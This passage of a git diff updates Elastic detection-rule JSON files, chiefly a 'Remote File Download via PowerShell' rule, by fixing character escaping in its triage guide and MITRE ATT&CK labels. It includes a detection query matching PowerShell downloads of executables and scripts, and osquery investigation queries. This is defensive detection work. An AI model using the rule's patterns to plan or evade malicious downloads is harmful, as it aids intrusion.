b/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_4.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_5.json b/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_5.json index 916a313b789..5e57d8f16b8 100644 --- a/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_5.json +++ b/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_5.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_104.json b/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_104.json index 19a806c6b19..f6a3aa40546 100644 --- a/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_104.json +++ b/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_104.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via PowerShell\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nPowerShell is one of system administrators' main tools for automation, report routines, and other tasks. This makes it available for use in various environments and creates an attractive way for attackers to execute code and perform actions. This rule correlates network and file events to detect downloads of executable and script files performed using PowerShell.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators can use PowerShell legitimately to download executable and script files. Analysts can dismiss the alert if the Administrator is aware of the activity and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via PowerShell\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nPowerShell is one of system administrators' main tools for automation, report routines, and other tasks. This makes it available for use in various environments and creates an attractive way for attackers to execute code and perform actions. This rule correlates network and file events to detect downloads of executable and script files performed using PowerShell.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators can use PowerShell legitimately to download executable and script files. Analysts can dismiss the alert if the Administrator is aware of the activity and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id with maxspan=30s\n [network where host.os.type == \"windows\" and process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and network.protocol == \"dns\" and\n not dns.question.name : (\"localhost\", \"*.microsoft.com\", \"*.azureedge.net\", \"*.powershellgallery.com\", \"*.windowsupdate.com\", \"metadata.google.internal\") and\n not user.domain : \"NT AUTHORITY\"]\n [file where host.os.type == \"windows\" and process.name : \"powershell.exe\" and event.type == \"creation\" and file.extension : (\"exe\", \"dll\", \"ps1\", \"bat\") and\n not file.name : \"__PSScriptPolicy*.ps1\"]\n", "related_integrations": [ { @@ -90,7 +90,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -105,7 +105,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_105.json b/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_105.json index 83863129568..a1d84a7675c 100644 --- a/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_105.json +++ b/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_105.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via PowerShell\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nPowerShell is one of system administrators' main tools for automation, report routines, and other tasks. This makes it available for use in various environments and creates an attractive way for attackers to execute code and perform actions. This rule correlates network and file events to detect downloads of executable and script files performed using PowerShell.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators can use PowerShell legitimately to download executable and script files. Analysts can dismiss the alert if the Administrator is aware of the activity and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via PowerShell\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nPowerShell is one of system administrators' main tools for automation, report routines, and other tasks. This makes it available for use in various environments and creates an attractive way for attackers to execute code and perform actions. This rule correlates network and file events to detect downloads of executable and script files performed using PowerShell.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators can use PowerShell legitimately to download executable and script files. Analysts can dismiss the alert if the Administrator is aware of the activity and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id with maxspan=30s\n [network where host.os.type == \"windows\" and process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and network.protocol == \"dns\" and\n not dns.question.name : (\"localhost\", \"*.microsoft.com\", \"*.azureedge.net\", \"*.powershellgallery.com\", \"*.windowsupdate.com\", \"metadata.google.internal\") and\n not user.domain : \"NT AUTHORITY\"]\n [file where host.os.type == \"windows\" and process.name : \"powershell.exe\" and event.type == \"creation\" and file.extension : (\"exe\", \"dll\", \"ps1\", \"bat\") and\n not file.name : \"__PSScriptPolicy*.ps1\"]\n", "related_integrations": [ { @@ -90,7 +90,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -105,7 +105,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_106.json b/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_106.json index 4b1877e1560..550d92955ac 100644 --- a/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_106.json +++ b/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_106.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via PowerShell\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nPowerShell is one of system administrators' main tools for automation, report routines, and other tasks. This makes it available for use in various environments and creates an attractive way for attackers to execute code and perform actions. This rule correlates network and file events to detect downloads of executable and script files performed using PowerShell.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators can use PowerShell legitimately to download executable and script files. Analysts can dismiss the alert if the Administrator is aware of the activity and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via PowerShell\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nPowerShell is one of system administrators' main tools for automation, report routines, and other tasks. This makes it available for use in various environments and creates an attractive way for attackers to execute code and perform actions. This rule correlates network and file events to detect downloads of executable and script files performed using PowerShell.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators can use PowerShell legitimately to download executable and script files. Analysts can dismiss the alert if the Administrator is aware of the activity and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id with maxspan=30s\n [network where host.os.type == \"windows\" and process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and network.protocol == \"dns\" and\n not dns.question.name : (\"localhost\", \"*.microsoft.com\", \"*.azureedge.net\", \"*.powershellgallery.com\", \"*.windowsupdate.com\", \"metadata.google.internal\") and\n not user.domain : \"NT AUTHORITY\"]\n [file where host.os.type == \"windows\" and process.name : \"powershell.exe\" and event.type == \"creation\" and file.extension : (\"exe\", \"dll\", \"ps1\", \"bat\") and\n not file.name : \"__PSScriptPolicy*.ps1\"]\n", "related_integrations": [ { @@ -89,7 +89,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -104,7 +104,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_107.json b/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_107.json index 9a5f86c1d21..385f795d500 100644 --- a/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_107.json +++ b/packages/security_detection_engine/kibana/security_rule/33f306e8-417c-411b-965c-c2812d6d3f4d_107.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via PowerShell\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nPowerShell is one of system administrators' main tools for automation, report routines, and other tasks. This makes it available for use in various environments and creates an attractive way for attackers to execute code and perform actions. This rule correlates network and file events to detect downloads of executable and script files performed using PowerShell.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Administrators can use PowerShell legitimately to download executable and script files. Analysts can dismiss the alert if the Administrator is aware of the activity and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise 